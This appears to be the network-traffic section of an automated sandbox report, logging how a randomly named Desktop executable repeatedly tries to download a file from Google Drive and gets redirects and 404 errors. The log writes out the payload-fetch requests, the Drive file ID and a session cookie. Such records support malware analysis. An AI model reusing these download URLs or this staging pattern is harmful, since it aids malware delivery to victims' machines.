                                                                    Dec 3, 2024 17:26:53.491525888 CET49984443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:26:53.491535902 CET44349984142.250.181.33192.168.2.5
                                                                    Dec 3, 2024 17:26:53.606972933 CET49985443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:26:53.607028008 CET44349985172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:26:53.607136965 CET49985443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:26:53.607451916 CET49985443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:26:53.607469082 CET44349985172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:26:55.647016048 CET44349985172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:26:55.647130013 CET49985443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:26:55.647813082 CET44349985172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:26:55.647869110 CET49985443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:26:55.649823904 CET49985443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:26:55.649837971 CET44349985172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:26:55.650093079 CET44349985172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:26:55.650152922 CET49985443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:26:55.650549889 CET49985443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:26:55.695357084 CET44349985172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:26:56.576344013 CET44349985172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:26:56.576412916 CET49985443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:26:56.576431990 CET44349985172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:26:56.576474905 CET49985443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:26:56.577702045 CET49985443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:26:56.577744007 CET44349985172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:26:56.577802896 CET49985443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:26:56.582710028 CET49986443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:26:56.582741976 CET44349986142.250.181.33192.168.2.5
                                                                    Dec 3, 2024 17:26:56.582808971 CET49986443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:26:56.583039045 CET49986443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:26:56.583048105 CET44349986142.250.181.33192.168.2.5
                                                                    Dec 3, 2024 17:26:58.329927921 CET44349986142.250.181.33192.168.2.5
                                                                    Dec 3, 2024 17:26:58.330002069 CET49986443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:26:58.330476046 CET49986443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:26:58.330482006 CET44349986142.250.181.33192.168.2.5
                                                                    Dec 3, 2024 17:26:58.330672979 CET49986443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:26:58.330678940 CET44349986142.250.181.33192.168.2.5
                                                                    Dec 3, 2024 17:26:59.309048891 CET44349986142.250.181.33192.168.2.5
                                                                    Dec 3, 2024 17:26:59.309195995 CET49986443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:26:59.309290886 CET44349986142.250.181.33192.168.2.5
                                                                    Dec 3, 2024 17:26:59.309340000 CET49986443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:26:59.309351921 CET44349986142.250.181.33192.168.2.5
                                                                    Dec 3, 2024 17:26:59.309364080 CET44349986142.250.181.33192.168.2.5
                                                                    Dec 3, 2024 17:26:59.309393883 CET49986443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:26:59.309420109 CET49986443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:26:59.310136080 CET49986443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:26:59.310149908 CET44349986142.250.181.33192.168.2.5
                                                                    Dec 3, 2024 17:26:59.419579029 CET49987443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:26:59.419634104 CET44349987172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:26:59.419711113 CET49987443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:26:59.420067072 CET49987443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:26:59.420084000 CET44349987172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:27:01.166194916 CET44349987172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:27:01.166347980 CET49987443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:27:01.166948080 CET44349987172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:27:01.167007923 CET49987443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:27:01.168920994 CET49987443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:27:01.168931961 CET44349987172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:27:01.169179916 CET44349987172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:27:01.169239998 CET49987443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:27:01.169559002 CET49987443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:27:01.215332985 CET44349987172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:27:02.097677946 CET44349987172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:27:02.097798109 CET49987443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:27:02.098015070 CET49987443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:27:02.098067999 CET44349987172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:27:02.098129988 CET49987443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:27:02.102639914 CET49988443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:27:02.102695942 CET44349988142.250.181.33192.168.2.5
                                                                    Dec 3, 2024 17:27:02.102767944 CET49988443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:27:02.103032112 CET49988443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:27:02.103045940 CET44349988142.250.181.33192.168.2.5
                                                                    Dec 3, 2024 17:27:03.867382050 CET44349988142.250.181.33192.168.2.5
                                                                    Dec 3, 2024 17:27:03.867515087 CET49988443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:27:03.872822046 CET49988443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:27:03.872833014 CET44349988142.250.181.33192.168.2.5
                                                                    Dec 3, 2024 17:27:03.873035908 CET49988443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:27:03.873042107 CET44349988142.250.181.33192.168.2.5
                                                                    Dec 3, 2024 17:27:04.881588936 CET44349988142.250.181.33192.168.2.5
                                                                    Dec 3, 2024 17:27:04.881664991 CET49988443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:27:04.881696939 CET44349988142.250.181.33192.168.2.5
                                                                    Dec 3, 2024 17:27:04.881743908 CET49988443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:27:04.882302999 CET49988443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:27:04.882343054 CET44349988142.250.181.33192.168.2.5
                                                                    Dec 3, 2024 17:27:04.882426977 CET49988443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:27:04.997775078 CET49989443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:27:04.997805119 CET44349989172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:27:04.997936010 CET49989443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:27:04.998277903 CET49989443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:27:04.998291969 CET44349989172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:27:06.783906937 CET44349989172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:27:06.783981085 CET49989443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:27:06.784688950 CET44349989172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:27:06.784737110 CET49989443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:27:06.786196947 CET49989443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:27:06.786215067 CET44349989172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:27:06.786457062 CET44349989172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:27:06.786504984 CET49989443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:27:06.786885023 CET49989443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:27:06.831330061 CET44349989172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:27:07.778809071 CET44349989172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:27:07.778970003 CET49989443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:27:07.779186010 CET49989443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:27:07.779227972 CET44349989172.217.19.174192.168.2.5
                                                                    Dec 3, 2024 17:27:07.779283047 CET49989443192.168.2.5172.217.19.174
                                                                    Dec 3, 2024 17:27:07.784308910 CET49990443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:27:07.784362078 CET44349990142.250.181.33192.168.2.5
                                                                    Dec 3, 2024 17:27:07.784432888 CET49990443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:27:07.784708977 CET49990443192.168.2.5142.250.181.33
                                                                    Dec 3, 2024 17:27:07.784729958 CET44349990142.250.181.33192.168.2.5
                                                                    Dec 3, 2024 17:27:09.531110048 CET44349990142.250.181.33192.168.2.5
                                                                    Dec 3, 2024 17:27:09.531244040 CET49990443192.168.2.5142.250.181.33
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 3, 2024 17:24:43.939851999 CET6443053192.168.2.51.1.1.1
                                                                    Dec 3, 2024 17:24:44.078474045 CET53644301.1.1.1192.168.2.5
                                                                    Dec 3, 2024 17:24:46.767811060 CET5484653192.168.2.51.1.1.1
                                                                    Dec 3, 2024 17:24:46.905855894 CET53548461.1.1.1192.168.2.5
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Dec 3, 2024 17:24:43.939851999 CET192.168.2.51.1.1.10xab92Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                    Dec 3, 2024 17:24:46.767811060 CET192.168.2.51.1.1.10x86f6Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Dec 3, 2024 17:24:44.078474045 CET1.1.1.1192.168.2.50xab92No error (0)drive.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                                    Dec 3, 2024 17:24:46.905855894 CET1.1.1.1192.168.2.50x86f6No error (0)drive.usercontent.google.com142.250.181.33A (IP address)IN (0x0001)false
                                                                    • drive.google.com
                                                                    • drive.usercontent.google.com
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.549883172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:24:45 UTC216OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    2024-12-03 16:24:46 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:24:46 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: script-src 'nonce-zZSGbilwWxdoQ8_AItPV3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.549891142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:24:48 UTC258OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    2024-12-03 16:24:49 UTC2228INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:24:49 GMT
                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Security-Policy: script-src 'nonce-w4Nk7CPE6cfxidFDK9YX1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC4IZ1UKe95e7eiyaX1aQifSrINwSmHefyMRJ9yGRUoyMXvHLj7LxfWRZYFuz7AzwYF6UYyA-cmuUA
                                                                    Server: UploadServer
                                                                    Set-Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw; expires=Wed, 04-Jun-2025 16:24:49 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2024-12-03 16:24:49 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 34 72 58 4c 7a 48 36 69 74 43 63 73 38 67 76 4f 41 77 50 67 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Y4rXLzH6itCcs8gvOAwPgA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.549898172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:24:51 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:24:52 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:24:52 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: script-src 'nonce-sWy5NKVIFzZXxQ7egQgqaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.549905142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:24:54 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:24:55 UTC1854INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:24:54 GMT
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-GiVm0NDVrADNxPcxz8-9Zg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC5o1xYDUqG2ajoJzKaBFJO3k6UCvcQb-NfDTDZBlPl9uxbVYbT57MUJuqbKFxnYNUogLNSt4AHoAA
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2024-12-03 16:24:55 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 35 72 32 34 34 51 6d 52 37 71 56 53 31 51 50 67 5f 6a 37 59 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="b5r244QmR7qVS1QPg_j7YQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.549912172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:24:57 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:24:58 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:24:57 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: script-src 'nonce-1nMG8IN-XaNt6JpxMRXkAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
